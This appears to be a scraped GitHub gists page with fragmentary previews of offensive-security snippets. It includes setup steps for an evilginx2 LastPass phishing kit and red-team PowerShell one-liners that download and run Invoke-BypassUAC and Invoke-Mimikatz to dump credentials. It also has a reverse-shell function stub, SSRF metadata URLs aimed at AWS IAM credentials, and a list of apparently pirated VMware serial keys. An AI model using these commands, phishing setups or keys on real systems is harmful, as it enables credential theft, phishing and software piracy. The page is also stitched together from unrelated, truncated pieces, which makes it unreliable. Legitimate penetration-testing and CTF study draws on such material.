- Create msf rc file for standard msfvenom binaries
function revshell() {
# $1 language
# Default tun0 1337
INF=tun0
PORT=1337
pberba
/ evilginx2-lastpass.sh
Last active
January 27, 2022 19:33
How to get Lastpass Phishlet for evilginx2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install go first | |
| export GOPATH=$HOME/go | |
| export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin | |
| sudo apt-get install git make | |
| go get -u github.com/kgretzky/evilginx2 | |
| cd $GOPATH/src/github.com/kgretzky/evilginx2 | |
| git remote add pberba https://github.com/pberba/evilginx2.git | |
| git fetch pberba | |
| git checkout -b lastpass pberba/feature/lastpass |
yassineaboukir
/ List of API endpoints & objects
Last active
April 23, 2024 19:31
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
gopalindians
/ VMware Workstation 15.x.x serial key
Last active
April 24, 2024 14:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Serial Keys: | |
| FU512-2DG1H-M85QZ-U7Z5T-PY8ZD | |
| CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD | |
| GV7N2-DQZ00-4897Y-27ZNX-NV0TD | |
| YZ718-4REEQ-08DHQ-JNYQC-ZQRD0 | |
| GZ3N0-6CX0L-H80UP-FPM59-NKAD4 | |
| YY31H-6EYEJ-480VZ-VXXZC-QF2E0 | |
| ZG51K-25FE1-H81ZP-95XGT-WV2C0 | |
| VG30H-2AX11-H88FQ-CQXGZ-M6AY4 |
AvasDream
/ revshell.md
Last active
May 29, 2019 15:08
Bash Function to create a reverseshell from tun0 interface. Might come in handy in CTFs or HackTheBox.
jivoi
/ RedTeam_CheatSheet.ps1
Created
July 14, 2018 14:52
— forked from m8sec/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
notdodo
/ steghide_brute.py
Last active
September 8, 2019 15:32
CTF Multicore bruteforcer for `steghide`
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- encoding: utf-8 -*- | |
| import multiprocessing as mp | |
| import os | |
| import subprocess | |
| import time | |
| import sys | |
| try: | |
| import click | |
| from colored import fg, stylize |
random-robbie
/ ssrf.svg
Created
May 25, 2018 15:03
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load(); |
jhaddix
/ cloud_metadata.txt
Last active
April 25, 2024 11:19
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
jhaddix
/ Testing_Checklist.md
Last active
March 9, 2024 16:18
— forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
NewerOlder